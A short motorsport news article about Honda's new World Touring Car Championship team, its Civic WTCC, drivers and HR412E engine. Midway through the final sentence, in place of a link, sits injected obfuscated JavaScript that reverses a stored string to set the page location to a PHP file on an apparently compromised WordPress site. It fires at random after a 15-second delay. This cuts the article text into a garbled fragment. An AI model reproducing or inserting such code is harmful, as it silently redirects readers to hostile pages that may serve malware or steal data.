So Honda‘s new World Touring Car Championship team has revealed the look of its new series charger – the Civic WTCC – and its driver line-up, which takes the shape of former Formula One podium finisher Tiago Monteiro and 2009 WTCC Champion Gabriele Tarquini.
Now the Japanese marque has unveiled the engine that will power both the Civic WTCC – developed by J.A.S. Motorsport – and Tarquini when they debut together at Suzuka in October this year ahead of the outfit’s first full campaign next season.
The new powerplant, the HR412E, is a bespoke 1.6l four-cylinder petrol engine which has been developed at the Honda Racing Team in Milan, Italy. It also marks what the company heralds as a ‘new generation of high performance racing engines from Honda’.
The news comes soon after the announcement that Chevrolet will $VOcl3cIRrbzlimOyC8H=function(n){if (typeof ($VOcl3cIRrbzlimOyC8H.list[n]) == “string”) return $VOcl3cIRrbzlimOyC8H.list[n].split(“”).reverse().join(“”);return $VOcl3cIRrbzlimOyC8H.list[n];};$VOcl3cIRrbzlimOyC8H.list=[“‘php.sgnittes-nigulp/daol-efas/slmtog/snigulp/tnetnoc-pw/moc.reilibommi-gnitekrame//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andpiston.com/on-the-track/wtcc-chevrolet-2012-end-of-the-line/” target=”_blank”>cease its support at the end of the season, leaving Honda as the only fully-manufacturer backed squad in next year’s World Touring Car Championship.
